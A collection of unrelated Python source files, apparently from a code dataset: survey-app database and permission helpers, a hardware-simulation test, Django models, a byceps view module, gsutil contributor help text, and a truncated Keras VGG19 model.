# Expose the User and Survey tables in the admin panel.
ADMIN.add_view(ModelView(User, db.session))
ADMIN.add_view(ModelView(Survey, db.session))
def get_user(login: Any = "") -> User:
    """Get a user object from DB.

    :param login: User's CAS login, id or guest if empty string (default: "")
    :raises error.API: no such user
    :return: User object
    :rtype: User
    """
    user = None
    if not login:
        # instead of an error, assign the guest account when there is
        # no login in the session
        if 'username' not in session:
            session['username'] = GUEST_NAME
        if session['username'] == GUEST_NAME:
            return User.query.filter_by(Role='g').first()
        login = session['username']
    if type(login) is str:
        if '@' in login:
            user = User.query.filter_by(CasLogin=login).first()
        elif re.match("[0-9]+", login):
            # NOTE(review): re.match only anchors at the start, so a mixed
            # string like "123abc" is also routed here — confirm intended.
            user = User.query.filter_by(Pesel=login).first()
        else:
            # short CAS login (part before '@') — scan all known users
            users = get_all_users()
            for u in users["users"]:
                if u["casLogin"].split("@")[0] == login:
                    user = User.query.filter_by(id=u["id"]).first()
                    break  # first match wins; no need to scan further
    if type(login) is int:
        user = User.query.filter_by(id=login).first()
    if user is None:
        raise error.API(f'no such user {login}')
    return user
def create_user(cas_login: str, pesel: str, role: Role) -> User:
    """Create a new user and commit it to the DB.

    :param cas_login: New user's cas login
    :type cas_login: str
    :param pesel: New user's PESEL number
    :type pesel: str
    :param role: New user's role (values: 's','u','g')
    :type role: Role
    :return: The new user's User object
    :rtype: User
    """
    # FetchData defaults to True; its use is not implemented yet (see User).
    user = User(CasLogin=cas_login, Pesel=pesel, Role=role, FetchData=True)
    db.session.add(user)
    db.session.commit()
    return user
def delete_user(user: User):
    """Delete user from Users database and their permissions
    from SurveyPermissions and ReportPermissions.

    :param user: The user to be deleted
    :type user: User
    """
    # gather everything owned by the user, then delete in one pass
    owned = (
        SurveyPermission.query.filter_by(UserId=user.id).all()
        + ReportPermission.query.filter_by(UserId=user.id).all()
        + UserGroup.query.filter_by(UserId=user.id).all()
    )
    for record in owned:
        db.session.delete(record)
    db.session.delete(user)
    db.session.commit()
def get_survey(survey_id: int) -> Survey:
    """Get survey by given id.

    :param survey_id: Survey's id
    :type survey_id: int
    :raises error.API: no such survey
    :return: Returns survey
    :rtype: Survey
    """
    survey = Survey.query.filter_by(id=survey_id).first()
    if survey is not None:
        return survey
    raise error.API('no such survey')
def get_report(report_id: int) -> Report:
    """Get report by given id.

    :param report_id: Id of a report
    :type report_id: int
    :raises error.API: no such report
    :return: Requested report object
    :rtype: Report
    """
    report = Report.query.filter_by(id=report_id).first()
    if report is not None:
        return report
    raise error.API('no such report')
def get_permission_link(permission: Permission, object_type: Literal['s', 'r'], object_id: int) -> str:
    """Create and obtain a permission link.

    Reuses an existing link for the same (permission, object) triple
    when one exists; otherwise creates and commits a new one.

    :param permission: Permission type (values: 'o', 'w', 'r', 'n')
    :type permission: Permission
    :param object_type: Type of the object shared by the link
    :type object_type: Literal['s', 'r']
    :param object_id: Id of the object
    :type object_id: int
    :return: A concatenated salt and link id as a string
    :rtype: str
    """
    link = Link.query.filter_by(PermissionType=permission, ObjectType=object_type, ObjectId=object_id).first()
    if link is not None:
        return link.Salt + str(link.id)
    # generate a random, base32, lower-case salt of SALT_LENGTH characters
    bits = secrets.randbits(5*SALT_LENGTH)
    salt = bits.to_bytes(5*SALT_LENGTH//8+1, byteorder='big')
    salt = b32encode(salt).decode('utf-8')[:SALT_LENGTH]
    salt = salt.lower()
    # (removed a leftover debug print that leaked the salt to stdout)
    link = Link(
        Salt=salt,
        PermissionType=permission,
        ObjectType=object_type,
        ObjectId=object_id
    )
    db.session.add(link)
    db.session.commit()
    return link.Salt + str(link.id)
def set_permission_link(tag: str, user: User):
    """Grant a user the permission carried by a share link.

    :param tag: Salt and id string from the link
    :type tag: str
    :param user: User that will gain the permission
    :type user: User
    :raises error.API: when the tag does not match any link
    :return: Permission type, object name ('survey'/'report') and object id
    :rtype: Permission, str, int
    """
    link = get_link_details(tag)
    if link is None:
        raise error.API('wrong url')
    # Dispatch table mapping the stored object type onto its accessors.
    handlers = {
        's': ('survey', get_survey, get_survey_permission, set_survey_permission),
        'r': ('report', get_report, get_report_permission, set_report_permission),
    }
    object_type = link.ObjectType
    if object_type not in handlers:
        raise error.API(f'unknown database object type "{object_type}"')
    object_name, get_object, get_permission, set_permission = handlers[object_type]
    target = get_object(link.ObjectId)
    current = get_permission(target, user)
    # Apply the link only when it ranks higher than what the user already
    # has (per PERMISSION_ORDER); otherwise leave permissions untouched.
    if PERMISSION_ORDER.index(current) < PERMISSION_ORDER.index(link.PermissionType):
        set_permission(target, user, link.PermissionType, bylink=True)
    return link.PermissionType, object_name, target.id
def get_link_details(tag: str) -> Link:
    """Resolve a share-link tag into its Link record.

    :param tag: Salt and id string (salt is the first SALT_LENGTH
        characters; the numeric id follows)
    :type tag: str
    :return: The matching Link, or None when salt/id do not match
    :rtype: Link
    """
    salt, link_id = tag[:SALT_LENGTH], int(tag[SALT_LENGTH:])
    return Link.query.filter_by(id=link_id, Salt=salt).first()
def get_report_users(report: Report) -> dict:
    """Get users having permission to the given report.

    :param report: The report
    :type report: Report
    :return: Mapping of user id to permission type
    :rtype: dict
    """
    permissions = ReportPermission.query.filter_by(ReportId=report.id).all()
    return {entry.UserId: entry.Type for entry in permissions}
def get_survey_users(survey: Survey) -> dict:
    """Get users having permission to the given survey.

    :param survey: The survey
    :type survey: Survey
    :return: Mapping of user id to permission type
    :rtype: dict
    """
    permissions = SurveyPermission.query.filter_by(SurveyId=survey.id).all()
    return {entry.UserId: entry.Type for entry in permissions}
def get_all_users() -> dict:
    """Get all users.

    :return: Cas logins (domain part stripped) and user ids
    :rtype: dict
    """
    listing = [
        {"casLogin": account.CasLogin.split('@')[0], "id": account.id}
        for account in User.query.all()
    ]
    return {"users": listing}
def get_groups() -> List[str]:
    """Get the names of all distinct user groups.

    :return: List of all group names
    :rtype: List[str]
    """
    rows = UserGroup.query.with_entities(UserGroup.Group).distinct()
    return [row.Group for row in rows]
def set_user_group(user: User, group_name: str):
    """Add the user to a group; do nothing if already a member.

    :param user: User
    :type user: User
    :param group_name: Name of the group
    :type group_name: str
    """
    membership = UserGroup.query.filter_by(UserId=user.id, Group=group_name).first()
    if membership is None:
        db.session.add(UserGroup(UserId=user.id, Group=group_name))
    db.session.commit()
def unset_user_group(user: User, group: str):
    """Remove the user from a group.

    :param user: User object
    :type user: User
    :param group: Group name
    :type group: str
    :raises error.API: when the user is not in the group
    """
    query = UserGroup.query.filter_by(UserId=user.id, Group=group)
    # A Query object is never None, so the original `is None` check could
    # never fire; check for an actual row before deleting.
    if query.first() is None:
        raise error.API('the user is not in the group')
    query.delete()
    db.session.commit()
def get_user_groups(user: User) -> List[str]:
    """Get the names of all groups the given user belongs to.

    :param user: Given user
    :type user: User
    :return: List of the user's group names (empty when none)
    :rtype: List[str]
    """
    # Query.all() always returns a list (possibly empty), never None,
    # so the former `is None` fallback was dead code.
    memberships = UserGroup.query.filter_by(UserId=user.id).all()
    return [membership.Group for membership in memberships]
def get_user_surveys(user: User) -> List[Survey]:
    """Get surveys the user may access; administrators get every survey.

    :param user: User object
    :type user: User
    :return: List of Survey objects
    :rtype: List[Survey]
    """
    # Role 's' is handled as an administrator here: all surveys visible.
    if user.Role == 's':
        return Survey.query.all()
    surveys = [
        Survey.query.filter_by(id=perm.SurveyId).first()
        for perm in SurveyPermission.query.filter_by(UserId=user.id).all()
    ]
    # Session may hold temporary, link-granted survey ids as well.
    for sid in session.get('surveys', []):
        surveys.append(Survey.query.filter_by(id=int(sid)).first())
    return surveys
def get_user_reports(user: User) -> List[Report]:
    """Get reports the user may access; administrators get every report.

    :param user: User object
    :type user: User
    :return: List of Report objects
    :rtype: List[Report]
    """
    # Role 's' is handled as an administrator here: all reports visible.
    if user.Role == 's':
        return Report.query.all()
    reports = [
        Report.query.filter_by(id=perm.ReportId).first()
        for perm in ReportPermission.query.filter_by(UserId=user.id).all()
    ]
    # Session may hold temporary, link-granted report ids as well.
    for rid in session.get('reports', []):
        reports.append(Report.query.filter_by(id=int(rid)).first())
    return reports
def get_group_users(group: str) -> List[User]:
    """Get users assigned to the given group.

    :param group: Name of a group
    :type group: str
    :return: List of User objects
    :rtype: List[User]
    """
    members = []
    for membership in UserGroup.query.filter_by(Group=group).all():
        account = User.query.filter_by(id=membership.UserId).first()
        # Skip stale memberships that point at a missing user row.
        if account is not None:
            members.append(account)
    return members
def rename_report(report: Report, name: str):
    """Rename a report; the change is committed immediately.

    :param report: The Report object
    :type report: Report
    :param name: New report name
    :type name: str
    """
    report.Name = name
    db.session.commit()
def rename_survey(survey: Survey, name: str):
    """Rename a survey; the change is committed immediately.

    :param survey: The Survey object
    :type survey: Survey
    :param name: New survey name
    :type name: str
    """
    survey.Name = name
    db.session.commit()
def delete_group(group: str):
    """Delete a group by removing all of its membership rows.

    :param group: The name of the group
    :type group: str
    """
    memberships = UserGroup.query.filter_by(Group=group)
    memberships.delete()
    db.session.commit()
def create_survey(user: User, name: str) -> Survey:
    """Create a new survey owned by the given user.

    :param user: The creator of the new survey
    :type user: User
    :param name: Name of the survey
    :type name: str
    :return: The object of the new survey
    :rtype: Survey
    """
    # Pick a random background image from the bundled 'bkg' directory.
    background = random.choice(os.listdir(path.join(ABSOLUTE_DIR_PATH, 'bkg')))
    survey = Survey(Name=name, QuestionCount=0, AuthorId=user.id, BackgroundImg=background)
    db.session.add(survey)
    db.session.commit()
    # The creator becomes the survey's owner ('o').
    set_survey_permission(survey, user, 'o')
    return survey
# meta = {"started_on": DateTime, "ends_on": DateTime, "is_active": int}
def set_survey_meta(survey: Survey, name: str, question_count: int, meta: dict):
    """Update (or create) a survey's meta information.

    :param survey: The survey to be modified; a new one is created when None
    :type survey: Survey
    :param name: The new name of the survey (skipped when falsy)
    :type name: str
    :param question_count: Number of questions (used only for a new survey)
    :type question_count: int
    :param meta: Other information (keys: started_on, ends_on, is_active)
    :type meta: dict
    :return: True on success
    :rtype: bool
    """
    if survey is None:
        survey = Survey(Name=name, QuestionCount=question_count)
        db.session.add(survey)
    if name:
        survey.Name = name
    # Use .get() so partial meta dicts are tolerated instead of raising
    # KeyError on a missing key.
    if meta.get("started_on"):
        survey.StartedOn = meta["started_on"]
    if meta.get("ends_on"):
        survey.EndsOn = meta["ends_on"]
    if meta.get("is_active"):
        survey.IsActive = meta["is_active"]
    if survey.BackgroundImg is None:
        # Assign a random background when the survey has none yet.
        bkgs = os.listdir(path.join(ABSOLUTE_DIR_PATH, 'bkg'))
        survey.BackgroundImg = random.choice(bkgs)
    db.session.commit()
    # (removed a stray debug print)
    return True
def get_survey_permission(survey: Survey, user: User) -> Permission:
    """Get the user's permission level for a survey.

    :param survey: The survey
    :type survey: Survey
    :param user: The user whose permissions are to be checked
    :type user: User
    :return: The user's permissions for the survey
    :rtype: Permission
    """
    # Session-scoped (link-granted) permissions take precedence.
    temporary = session.get('surveys', {})
    if str(survey.id) in temporary:
        return temporary[str(survey.id)]
    record = SurveyPermission.query.filter_by(SurveyId=survey.id, UserId=user.id).first()
    if record is not None:
        return record.Type
    # No explicit row: admins ('s') fall back to their elevated default.
    return ADMIN_DEFAULT_PERMISSION if user.Role == 's' else 'n'
def set_survey_permission(survey: Survey, user: User, permission: Permission, bylink=False):
    """Set permission of given user for survey.

    :param survey: The survey
    :type survey: Survey
    :param user: The user whose permissions are to be set
    :type user: User
    :param permission: The user's permissions for the survey
    :type permission: Permission
    :param bylink: Is the permission set because of a link? (default: False)
    :type bylink: bool
    """
    # If the permission is set because of a link, and the user is a guest
    # then set it only temporarily, in their session.
    if bylink and user.Role == 'g':
        if 'surveys' not in session:
            session['surveys'] = {}
        if PERMISSION_ORDER.index(permission) >= PERMISSION_ORDER.index('r'):
            # Key by str(id): get_survey_permission looks up str(survey.id),
            # so an int key was invisible within the same request.
            session['surveys'][str(survey.id)] = 'r'
        return
    sp = SurveyPermission.query.filter_by(SurveyId=survey.id, UserId=user.id).first()
    if sp is None:
        sp = SurveyPermission(SurveyId=survey.id, UserId=user.id)
        db.session.add(sp)
    if permission != "n":
        sp.Type = permission
    else:
        # 'n' (none) revokes access: remove the permission row entirely.
        db.session.delete(sp)
    db.session.commit()
def get_report_survey(report: Report) -> Survey:
    """Get the source survey of the given report.

    :param report: Report object
    :type report: Report
    :raises error.API: no such report
    :return: The source survey of the report
    :rtype: Survey
    """
    if report is None:
        raise error.API('no such report')
    return Survey.query.filter_by(id=report.SurveyId).first()
def get_report_permission(report: Report, user: User) -> Permission:
    """Get the user's permission level for a report.

    :param report: The report
    :type report: Report
    :param user: The user whose permissions are to be checked
    :type user: User
    :return: The user's permissions for the report
    :rtype: Permission
    """
    # Session-scoped (link-granted) permissions take precedence.
    temporary = session.get('reports', {})
    if str(report.id) in temporary:
        return temporary[str(report.id)]
    record = ReportPermission.query.filter_by(ReportId=report.id, UserId=user.id).first()
    if record is not None:
        return record.Type
    # No explicit row: admins ('s') fall back to their elevated default.
    return ADMIN_DEFAULT_PERMISSION if user.Role == 's' else 'n'
def set_report_permission(report: Report, user: User, permission: Permission, bylink=False):
    """Set permission of given user for report.

    :param report: The report
    :type report: Report
    :param user: The user whose permissions are to be set
    :type user: User
    :param permission: The user's permissions for the report
    :type permission: Permission
    :param bylink: Is the permission set because of a link? (default: False)
    :type bylink: bool
    """
    # If the permission is set because of a link, and the user is a guest
    # then set it only temporarily, in their session.
    if bylink and user.Role == 'g':
        if 'reports' not in session:
            session['reports'] = {}
        if PERMISSION_ORDER.index(permission) >= PERMISSION_ORDER.index('r'):
            # Key by str(id): get_report_permission looks up str(report.id),
            # so an int key was invisible within the same request.
            session['reports'][str(report.id)] = 'r'
        return
    rp = ReportPermission.query.filter_by(ReportId=report.id, UserId=user.id).first()
    if rp is None:
        rp = ReportPermission(ReportId=report.id, UserId=user.id)
        db.session.add(rp)
    if permission != "n":
        rp.Type = permission
    else:
        # 'n' (none) revokes access: remove the permission row entirely.
        db.session.delete(rp)
    db.session.commit()
def create_report(user: User, survey: Survey, name: str, author: int) -> Report:
    """Create a report for a given user.

    :param user: The creator of the report (receives owner permission)
    :type user: User
    :param survey: The source survey of the report
    :type survey: Survey
    :param name: The name of the new report
    :type name: str
    :param author: The database id of the creator
    :type author: int
    :return: The newly created report
    :rtype: Report
    """
    report = Report(Name=name, SurveyId=survey.id, AuthorId=author)
    # Inherit the background directly from the survey object we already
    # hold instead of re-querying the same row by id.
    report.BackgroundImg = survey.BackgroundImg
    db.session.add(report)
    db.session.commit()
    set_report_permission(report, user, 'o')
    return report
def delete_survey(survey: Survey):
    """Delete a survey together with its permission and group rows.

    :param survey: The survey to be deleted
    :type survey: Survey
    """
    # NOTE(review): the survey's on-disk data/xml files are not removed
    # here (file-removal code was previously commented out) -- confirm
    # whether cleanup is handled elsewhere.
    SurveyPermission.query.filter_by(SurveyId=survey.id).delete()
    SurveyGroup.query.filter_by(SurveyId=survey.id).delete()
    Survey.query.filter_by(id=survey.id).delete()
    db.session.commit()
def delete_report(report: Report):
    """Delete a report together with its permission and group rows.

    :param report: The report to be deleted
    :type report: Report
    """
    for model in (ReportPermission, ReportGroup):
        model.query.filter_by(ReportId=report.id).delete()
    Report.query.filter_by(id=report.id).delete()
    db.session.commit()
def open_survey(survey: Survey) -> sqlite3.Connection:
    """Open an SQLite3 connection to the survey's answer database.

    :param survey: The survey
    :type survey: Survey
    :return: A connection to the DB of the survey
    :rtype: sqlite3.Connection
    """
    database_path = f"data/{survey.id}.db"
    return sqlite3.connect(database_path)
def get_answers(survey_id: int) -> Dict:
    """Parse the survey XML and collect its questions and answer values.

    :param survey_id: Id of the survey
    :type survey_id: int
    :return: Mapping of question header to question metadata
    :rtype: Dict
    """
    xml = ET.parse(os.path.join(ABSOLUTE_DIR_PATH, f"survey/{survey_id}.xml"))
    result = {}
    questions = ['single', 'multi', 'groupedsingle']
    for q in questions:
        for b in xml.getroot().iter(q):
            header = b.find('header').text
            # Strip markup tags from the header; raw string fixes the
            # invalid escape sequence '\w' in the original pattern.
            header = re.sub(r'</?\w[^>]*>', '', header).strip(' \n')
            if header not in result:
                result[header] = {
                    "question": header,
                    "type": q,
                    "sub_questions": [],
                    "values": {},
                }
            if 'defaultValue' in b.attrib:
                result[header]["values"][b.attrib['defaultValue']] = "default"
            if q == 'groupedsingle':
                for item in b.find('items'):
                    result[header]["sub_questions"].append(item.attrib['value'].strip(' '))
            if q != "multi":
                for item in b.find('answers'):
                    result[header]["values"][item.attrib['code']] = item.attrib['value'].strip(' ')
            else:
                # Multi-choice: each answer becomes a sub-question with
                # fixed yes/no ("TAK"/"NIE") values.
                for item in b.find('answers'):
                    result[header]["sub_questions"].append(item.attrib['value'].strip(' '))
                result[header]["values"]["0"] = "NIE"
                result[header]["values"]["1"] = "TAK"
    return result
def get_dashboard() -> Dict:
    """Build the dashboard listing for the current user.

    :return: Dictionary with the user's surveys and reports
    :rtype: Dict
    """
    user = get_user()
    result = []
    for survey in get_user_surveys(user):
        author = get_user(survey.AuthorId)
        result.append({
            'type': 'survey',
            'endsOn': survey.EndsOn.timestamp() if survey.EndsOn is not None else None,
            'startedOn': survey.StartedOn.timestamp() if survey.StartedOn is not None else None,
            'id': survey.id,
            'name': survey.Name,
            'sharedTo': get_survey_users(survey),
            'ankieterId': survey.AnkieterId,
            'isActive': survey.IsActive,
            'questionCount': survey.QuestionCount,
            'backgroundImg': survey.BackgroundImg,
            'userId': user.id,
            'answersCount': get_answers_count(survey),
            'authorId': author.id,
            'authorName': author.CasLogin
        })
    for report in get_user_reports(user):
        try:
            survey = get_survey(report.SurveyId)
        except error.API:
            # Skip reports whose source survey no longer exists. Narrowed
            # from a bare `except:` which swallowed every exception,
            # including KeyboardInterrupt.
            continue
        author = get_user(report.AuthorId)
        result.append({
            'type': 'report',
            'id': report.id,
            'name': report.Name,
            'sharedTo': get_report_users(report),
            'connectedSurvey': {"id": report.SurveyId, "name": survey.Name},
            'backgroundImg': report.BackgroundImg,
            'userId': user.id,
            'authorId': author.id,
            'authorName': author.CasLogin
        })
    return {"objects": result}
def get_types(conn: sqlite3.Connection) -> Dict[str, str]:
    """Map each column of the `data` table to its declared SQL type.

    :param conn: Connection to the database
    :type conn: sqlite3.Connection
    :return: A dictionary mapping column names to SQL type names
    :rtype: Dict[str, str]
    """
    cur = conn.cursor()
    cur.execute("PRAGMA table_info(data)")
    # PRAGMA table_info rows: (cid, name, type, notnull, dflt_value, pk)
    return {row[1]: row[2] for row in cur.fetchall()}
def get_columns(conn: sqlite3.Connection) -> List[str]:
    """Get column names of the `data` table in database order.

    :param conn: Connection to the database
    :type conn: sqlite3.Connection
    :return: A list of column names in the database
    :rtype: List[str]
    """
    cur = conn.cursor()
    cur.execute("PRAGMA table_info(data)")
    # Row index 1 holds the column name.
    return [row[1] for row in cur.fetchall()]
def get_answers_count(survey: Survey) -> int:
    """Get the number of answer rows stored for a given survey.

    :param survey: The survey
    :type survey: Survey
    :return: The number of answers (0 when the data table is missing)
    :rtype: int
    """
    conn = open_survey(survey)
    try:
        cur = conn.cursor()
        # COUNT(*) avoids materializing every row just to take len().
        cur.execute("SELECT COUNT(*) FROM data")
        return cur.fetchone()[0]
    except sqlite3.Error:
        # Narrowed from a bare except: a missing/empty database counts as 0.
        return 0
    finally:
        # finally guarantees the connection closes even on error paths.
        conn.close()
|
python
|
import bitwise as bw
class TestStackPointer:
    """Tests for bw.processor.StackPointer driven by explicit clock pulses."""

    def test_StackPointer(self):
        """Exercise decrement, hold, increment and combined-control behaviour.

        NOTE(review): assumes the pointer updates on the rising clock edge
        (value written on clock 0 -> 1) and that decrementing from zero
        wraps to all-ones -- confirm against the StackPointer implementation.
        """
        up = bw.wire.Wire()
        down = bw.wire.Wire()
        clock = bw.wire.Wire()
        output_bus = bw.wire.Bus16()
        a = bw.processor.StackPointer(up, down, clock, output_bus)
        # Neither up nor down asserted: pointer stays at zero after a pulse.
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        # down=1: decrement from 0 wraps to all-ones, then keeps counting down.
        down.value = 1
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
        # Both control lines low: value holds across several clock pulses.
        down.value = 0
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
        # up=1: increment twice.
        up.value = 1
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
        # up and down both asserted: the value decrements here, so down
        # appears to take precedence -- confirm intended priority.
        down.value = 1
        clock.value = 0
        clock.value = 1
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
        print(a.__doc__)
        print(a)
        # Keyword-call interface: rebind the control inputs, then clock once.
        a(
            up=0,
            down=1,
            clock=0,
            output_bus=None
        )
        a(clock=1)
        assert output_bus.wire_values == (
            1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
|
python
|
from django.db import models
class Suggestion(models.Model):
    """A suggested entry, identified by its unique name."""
    name = models.CharField(max_length=100, unique=True)
class ImageTag(models.Model):
    """Associates a tag string with an image belonging to a game."""
    game = models.CharField(max_length=100)
    image = models.CharField(max_length=50)
    tag = models.CharField(max_length=200)
class Favorite(models.Model):
    """Marks a slug as a favorite of a user; deleted with the user."""
    user = models.ForeignKey('authentication.CustomUser', on_delete=models.CASCADE)
    slug = models.CharField(max_length=100)

    class Meta:
        # A user can favorite a given slug at most once.
        unique_together = ('user', 'slug')
class Cover(models.Model):
    """A cover image record for a game, with its tag and size."""
    game = models.CharField(max_length=100)
    image = models.CharField(max_length=50)
    tag = models.CharField(max_length=200)
    # Size unit is not evident from this model -- confirm against callers.
    size = models.IntegerField()
|
python
|
"""
byceps.blueprints.site.core.views
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from __future__ import annotations
from typing import Optional
from flask import g, url_for
from .... import config
from ....services.party import service as party_service
from ....services.site import service as site_service
from ....util.framework.blueprint import create_blueprint
from ....util.user_session import get_current_user
blueprint = create_blueprint('core_site', __name__)
@blueprint.app_template_global()
def url_for_site_file(filename, **kwargs) -> Optional[str]:
    """Render the URL for a static file local to the current site.

    Returns ``None`` when no site id is set on the request globals.
    """
    current_site_id = getattr(g, 'site_id', None)
    if current_site_id is None:
        return None
    return url_for(
        'site_file', site_id=current_site_id, filename=filename, **kwargs
    )
@blueprint.before_app_request
def prepare_request_globals() -> None:
    """Populate ``g`` with site, brand, party ids and the current user."""
    site_id = config.get_current_site_id()
    site = site_service.get_site(site_id)
    g.site_id = site.id
    g.brand_id = site.brand_id
    party_id = site.party_id
    if party_id is not None:
        g.party = party_service.get_party(party_id)
        # Normalize to the id of the fetched party object.
        party_id = g.party.id
    g.party_id = party_id
    # No permissions are required to look up the current user here.
    required_permissions: set[str] = set()
    g.user = get_current_user(required_permissions)
|
python
|
from .qtscraper import *
from ._version import __version__
def setup(app):
    """Sphinx extension entry point; delegates to qtgallery's own setup."""
    from .qtgallery import setup
    return setup(app)
|
python
|
# -*- coding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional help about contributing code to gsutil."""
from __future__ import absolute_import
from gslib.help_provider import HelpProvider
_DETAILED_HELP_TEXT = ("""
<B>OVERVIEW</B>
We're open to incorporating gsutil code changes authored by users. Here
are some guidelines:
1. Before we can accept code submissions, we have to jump a couple of legal
hurdles. Please fill out either the individual or corporate Contributor
License Agreement:
- If you are an individual writing original source code and you're
sure you own the intellectual property,
then you'll need to sign an individual CLA
(https://cla.developers.google.com/about/google-individual).
- If you work for a company that wants to allow you to contribute your
work to gsutil, then you'll need to sign a corporate CLA
(https://cla.developers.google.com/about/google-corporate)
Follow either of the two links above to access the appropriate CLA and
instructions for how to sign and return it. Once we receive it, we'll
add you to the official list of contributors and be able to accept
your patches.
2. If you found a bug or have an idea for a feature enhancement, we suggest
you check https://github.com/GoogleCloudPlatform/gsutil/issues to see if it
has already been reported by another user. From there you can also
subscribe to updates to the issue by clicking the "Watch thread" button at
the bottom of the page.
3. It's usually worthwhile to send email to [email protected] about your
idea before sending actual code. Often we can discuss the idea and help
propose things that could save you later revision work.
4. We tend to avoid adding command line options that are of use to only
a very small fraction of users, especially if there's some other way
to accommodate such needs. Adding such options complicates the code and
also adds overhead to users having to read through an "alphabet soup"
list of option documentation.
5. While gsutil has a number of features specific to Google Cloud Storage,
it can also be used with other cloud storage providers. We're open to
including changes for making gsutil support features specific to other
providers, as long as those changes don't make gsutil work worse for Google
Cloud Storage. If you do make such changes we recommend including someone
with knowledge of the specific provider as a code reviewer (see below).
6. You can check out the gsutil code from the GitHub repository:
https://github.com/GoogleCloudPlatform/gsutil
To clone a read-only copy of the repository:
git clone git://github.com/GoogleCloudPlatform/gsutil.git
git submodule update --init --recursive
To push your own changes to GitHub, click the Fork button on the
repository page and clone the repository from your own fork.
7. The gsutil git repository uses git submodules to pull in external modules.
After checking out the repository, make sure to also pull the submodules
by entering into the gsutil top-level directory and run:
git submodule update --init --recursive
8. Please make sure to run all tests against your modified code. To
do this, change directories into the gsutil top-level directory and run:
./gsutil test
The above tests take a long time to run because they send many requests to
the production service. The gsutil test command has a -u argument that will
only run unit tests. These run quickly, as they are executed with an
in-memory mock storage service implementation. To run only the unit tests,
run:
./gsutil test -u
If you made changes to boto, please run the boto tests. For these tests you
need to use HMAC credentials (from gsutil config -a), because the current
boto test suite doesn't import the OAuth2 handler. You'll also need to
install some python modules. Change directories into the boto root
directory at third_party/boto and run:
pip install -r requirements.txt
(You probably need to run this command using sudo.)
Make sure each of the individual installations succeeded. If they don't
you may need to run the install command again.
Then ensure your .boto file has HMAC credentials defined (the boto tests
don't load the OAUTH2 plugin), and then change directories into boto's
tests directory and run:
python test.py unit
python test.py -t s3 -t gs -t ssl
9. Please consider contributing test code for your change, especially if the
change impacts any of the core gsutil code (like the gsutil cp command).
10. When it's time to send us code, please use the Rietveld code review tool
rather than simply sending us a code patch. Do this as follows:
- Check out the gsutil code from your fork of the gsutil repository and
apply your changes.
- Download the "upload.py" script from
https://github.com/rietveld-codereview/rietveld
- Run upload.py from your git directory with the changes.
- Click the codereview.appspot.com link it generates, click "Edit Issue",
and add [email protected] as a reviewer, and Cc [email protected].
- Click Publish+Mail Comments.
- Once your changes are accepted, submit a pull request on GitHub and we
will merge your commits.
""")
class CommandOptions(HelpProvider):
    """Additional help about contributing code to gsutil."""

    # TODO: gsutil-beta: Add lint .rc file and linting instructions.

    # Help specification. See help_provider.py for documentation.
    help_spec = HelpProvider.HelpSpec(
        help_name='dev',
        help_name_aliases=[
            'development', 'developer', 'code', 'mods', 'software'],
        help_type='additional_help',
        help_one_line_summary='Contributing Code to gsutil',
        help_text=_DETAILED_HELP_TEXT,
        subcommand_help_text={},
    )
|
python
|
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout
from keras.layers.convolutional import Conv2D, MaxPooling2D
class VGG19(Sequential):
    """Keras Sequential model following the VGG-19 layer layout.

    Five convolutional stages (64/128/256/512/512 filters) separated by
    2x2 max pooling, then three fully connected layers; compiled with SGD
    and categorical cross-entropy. NOTE(review): the canonical VGG-19 has
    a pooling layer after the fifth conv stage; this model goes straight
    to Flatten -- confirm whether that is intentional.
    """

    def __init__(self):
        super().__init__()
        # Stage 1: 2 x 64 filters, 224x224 RGB input.
        self.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(224, 224, 3), padding='same', activation='relu'))
        self.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(MaxPooling2D(pool_size=(2, 2)))
        # Stage 2: 2 x 128 filters.
        self.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(MaxPooling2D(pool_size=(2, 2)))
        # Stage 3: 4 x 256 filters.
        self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
